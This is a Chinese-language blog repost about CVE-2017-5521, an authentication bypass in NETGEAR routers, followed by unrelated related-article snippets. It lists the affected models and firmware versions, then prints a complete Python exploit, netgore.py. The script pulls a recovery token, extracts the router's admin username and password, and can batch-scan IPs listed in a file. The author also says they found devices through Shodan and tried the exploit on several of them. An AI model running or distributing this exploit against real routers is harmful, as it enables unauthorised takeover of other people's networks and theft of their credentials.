CVE-2017-5521: Bypassing Authentication on NETGEAR Routers(Netgear认证绕过漏洞)
2024-05-19 16:37:40
SpiderLabs昨天发布的漏洞, 用户访问路由器的web控制界面尝试身份验证,然后又取消身份验证,用户就会被重定向到一个页面暴露密码恢复的token。然后通过passwordrecovered.cgi?id=TOKEN获取到路由器管理员密码。
漏洞细节
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911
漏洞影响范围:
Finding 1: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
# D6400 V1.0.0.34_1.3.34
# D6400 V1.0.0.38_1.1.38
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.30_10.0.73
# R6700 V1.0.1.14_10.0.29 (Latest beta)
# R6700 V1.0.0.26_10.0.26 (Latest stable)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.26_1.0.41
# R8500 V1.0.0.56_1.0.28
# R8500 V1.0.0.20_1.0.11
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.29_1.0.29
# VEGN2610 V1.0.0.27_1.0.27
# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.42_1.0.25
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# WN3100RP V1.0.0.14_1.0.19 (Latest)
# WN3100RP V1.0.0.6_1.0.12# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13Finding 2: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6300 V1.0.0.96_1.1.96 (Latest)
# D6300B V1.0.0.36_1.0.36
# D6300B V1.0.0.32_1.0.32
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.76_1.0.76 (Latest)
# DGN2200v4 V1.0.0.66_1.0.66
# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.56_1.0.43 (Latest)
# R6200 V1.0.1.52_1.0.41
# R6200 V1.0.1.48_1.0.37
# R6200v2 V1.0.3.10_10.1.10 (Latest)
# R6200v2 V1.0.1.20_1.0.18
# R6250 V1.0.4.6_10.1.12 (Latest beta)
# R6250 V1.0.4.2_10.1.10 (Latest stable)
# R6250 V1.0.1.84_1.0.78
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
# R6700 V1.0.0.26_10.0.26 (Latest)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R7000 V1.0.4.30_1.1.67
# R7900 V1.0.1.8_10.0.14 (Latest beta)
# R7900 V1.0.1.4_10.0.12 (Latest stable)
# R7900 V1.0.0.10_10.0.7
# R7900 V1.0.0.8_10.0.5
# R7900 V1.0.0.6_10.0.4
# R8000 V1.0.3.26_1.1.18 (Latest beta)
# R8000 V1.0.3.4_1.1.2 (Latest stable)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.30_1.0.43
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.27_1.0.27
# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
# VEVG2660 V1.0.0.23_1.0.23
# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
# WNDR3400v3 V1.0.1.2_1.0.51
# WNDR3400v3 V1.0.0.22_1.0.29
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500 V1.0.1.6_1.0.24
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.50_1.0.30
# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
# WNR1000v3 V1.0.2.62_60.0.87 (Latest)
# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
# WNR3500Lv2 V1.2.0.32_40.0.74
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13
Netgear漏洞利用exploit:
## netgore.py
import sys
import requestsdef scrape(text, start_trig, end_trig):if text.find(start_trig) != -1:return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]else:return "i_dont_speak_english"def exp1(ip,port):#disable nasty insecure ssl warningrequests.packages.urllib3.disable_warnings()#1st stage - get token# ip = sys.argv[1]# port = sys.argv[2]url = 'http://' + ip + ':' + port + '/'try:r = requests.get(url)except:url = 'https://' + ip + ':' + port + '/'r = requests.get(url, verify=False)model = r.headers.get('WWW-Authenticate')if model is not None:print "Attcking: " + model[13:-1]else:print "not a netgear router"#sys.exit(0)token = scrape(r.text, 'unauth.cgi?id=', '\"')if token == 'i_dont_speak_english':print "not vulnerable"#sys.exit(0)returnprint "token found: " + token#2nd stage - pass the token - get the passwordurl = url + 'passwordrecovered.cgi?id=' + tokenr = requests.post(url, verify=False)#profitif r.text.find('left\">') != -1:username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))username = scrape(username, '>', '\'')password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))password = scrape(password, '>', '\'')if username == "i_dont_speak_english":username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))else:print "not vulnerable becuse password recovery IS set"# sys.exit(0)return#html encoding pops out of nowhere, lets replace thatpassword = password.replace("#","#")password = password.replace("&","&")print "user: " + usernameprint "pass: " + passworddef exp2(ip,port):#disable nasty insecure ssl warningrequests.packages.urllib3.disable_warnings()#1st stage# ip = sys.argv[1]# port = sys.argv[2]url = 'http://' + ip + ':' + port + '/'try:r = requests.get(url)except:url = 'https://' + ip + ':' + port + '/'r = requests.get(url, verify=False)model = r.headers.get('WWW-Authenticate')if model is not None:print "Attcking: " + model[13:-1]else:print "not a netgear router"#sys.exit(0)return#2nd stageurl = url + 'passwordrecovered.cgi?id=get_rekt'try:r = requests.post(url, verify=False)except:print "not vulnerable router"#sys.exit(0)#profitif r.text.find('left\">') != -1:username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))username = scrape(username, '>', '\'')password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))password = scrape(password, '>', '\'')if username == "i_dont_speak_english":username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))else:print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"return# sys.exit(0)#html encoding pops out of nowhere, lets replace thatpassword = password.replace("#","#")password = password.replace("&","&")print "user: " + usernameprint "pass: " + passwordif __name__ == "__main__":if len(sys.argv) > 1:ip = sys.argv[1]port = sys.argv[2]print '---------start------------'print 'target',ip,port print '---------exp1------------'exp1(ip,port)print '---------exp2------------'exp2(ip,port)else:f = open('target.txt')for line in f:line = line.strip()l = line.split(' ')if len(l) > 1:#print lip = l[0]port = l[2]print '---------start------------'print 'target',ip,port print '---------exp1------------'exp1(ip,port)print '---------exp2------------'exp2(ip,port)f.close()
shodan搜索后测试了几个netgear设备,这个漏洞很清真:
转载于:https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html
CVE-2017-5521: Bypassing Authentication on NETGEAR Routers(Netgear认证绕过漏洞)相关推荐
- 速修复!Netgear交换机曝3个严重的认证绕过漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 昵称为 "Gynvael Coldwind" 的波兰安全研究员在网件中找到并报告了网件交换机中的三个严重漏洞 Demon's ...
- 【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现
目录 0x00 漏洞概述 0x01 影响版本 0x02 漏洞评级 0x03 shodan搜索漏洞环境 0x04 漏洞验证 0x05 修复建议 0x00 漏洞概述 友讯科技股份有限公司(D-Link C ...
- 速修复!Netgear 61款路由器和调制解调器中存在多个严重的预认证RCE漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 网络设备厂商Netgear 修复了今年的第五批严重的远程代码漏洞,这些漏洞影响的是 Netgear 的SOHO 路由器. 安全公司 GRIMM ...
- 绿盟科技网络安全威胁周报2017.19 关注Microsoft恶意软件防护引擎远程执行代码漏洞CVE-2017-0290...
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-19,绿盟科技漏洞库本周新增75条,其中高危61条.本次周报建议大家关注 Microsoft恶意软件防护引擎远程执行代码漏洞 .目前,微软官方 ...
- NETGEAR 系列路由器命令执行漏洞简析
NETGEAR 系列路由器命令执行漏洞简析 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR R7000路由器的命令注入漏洞.一时间,各路人马开始忙碌起来.厂商忙于声明和 ...
- linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...
0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...
- php cve 2017 12933,18-017 (March 27, 2018)
描述 * indicates a new version of an existing rule Deep Packet Inspection Rules: DCERPC Services - Cli ...
- 由看雪.Wifi万能钥匙 CTF 2017 第4题分析linux double free及unlinking漏洞
相关程序可以在这里下载: http://ctf.pediy.com/game-fight-34.htm 我是在ubuntu16 64位调试的 先说下知识点吧,简单的请参考我的上一篇文章: http:/ ...
- 速修复这些Netgear Orbi路由器漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 思科Talos团队发布了Netgear Orbi 740系列路由器和扩展卫星中多个漏洞的PoC exploit,其中一个漏洞是严重的远程命令执行 ...
最新文章
- 理解Linux的性能
- 快速迭代的测试人员的思考
- shp文件导入数据库
- mysql gno( )_MySql笔记(一)
- jzoj5123-diyiti【统计,容斥】
- mac os x10.8下如何使用git与github
- Hash表的扩容(转载)
- mysql like_MySQL LIKE:模糊查询
- SQL2000触发器
- (转)基于MVC4+EasyUI的Web开发框架经验总结(11)--使用Bundles处理简化页面代码...
- 编码问题,java,当不知道自己的字符串编码是什么的时候,可以用如下程序进行尝试并自动转码utf-8,源码直接可用
- 循序渐进!java开发手册阿里巴巴泰山版
- iOS swift 建立桥接文件及更改位置
- php获取手机品牌,9 大国产手机品牌相机水印大比拼,哪款才是你的最爱?
- ROS 安装教程Ubuntu16.04(2022年最新)
- 小米手机连接MAC电脑
- 网络中搜不到局域网内的其他计算机,局域网中搜不到其他计算机怎么修复
- CNS数据链测试模拟平台——POCKET
- MSSQL数据库的字段类型总结
- 生产环境openssl漏洞-升级openssl到最新版本